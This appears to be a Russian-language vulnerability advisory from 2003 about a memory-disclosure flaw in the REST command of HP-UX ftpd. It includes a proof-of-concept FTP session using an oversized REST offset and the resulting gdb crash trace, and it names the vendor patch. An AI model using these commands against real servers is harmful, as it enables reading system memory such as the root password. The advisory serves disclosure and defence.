| Дата публикации: | 10.06.2003 |
| Всего просмотров: | 1098 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость обнаружена в HP/UX 'ftpd' в команде REST. Удаленный пользователь может просматривать содержание произвольных файлов в памяти системы.
Сообщается, что удаленный пользователь может использовать команду REST (reset) и определить местоположение памяти, чтобы просматривать содержание файлов из памяти. Пример: (еще несколько примеров можно найти в источнике сообщения):
frieza elguapo $ ftp 192.168.1.111
Connected to 192.168.1.111.
220 kakarot FTP server (Version 1.1.214.4 Mon Feb 15 08:48:46 GMT 1999) ready.
Name (192.168.1.111:root): elguapo
331 Password required for elguapo.
Password:
230 User elguapo logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> rest 1111111111111111
restarting at 2147483647. execute get, put or append to initiate transfer
ftp> get .
local: . remote: .
200 PORT command successful.
# gdb /usr/lbin/ftpd 2862
GNU gdb 4.18-hppa-991112
Copyright 1998 Free Software Foundation, Inc.
/home/elguapo/2862: No such file or directory.
Attaching to program: /usr/lbin/ftpd, process 2862
Unable to find __dld_flags symbol in object file.
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xc00ef0b8 in ?? ()
(gdb) bt
#0 0xc00ef0b8 in ?? ()
Error accessing memory address 0x7fffffff: Bad address.
(gdb) info registers r3 r11
r3: 7fffffff
r11: 7fffffff
Уязвимость может использоваться, например, для получения root пароля из памяти.
Уязвимость связана с неправильным использованием конверсионного символа в строке формата. Уязвимость обнаружена в HP/UX ftpd 1.1.214.4 Hewlett Packard выпустил заплату PHNE_18377, устраняющую эту уязвимость. |
| Ссылки: | HPUX ftpd remote issue via REST |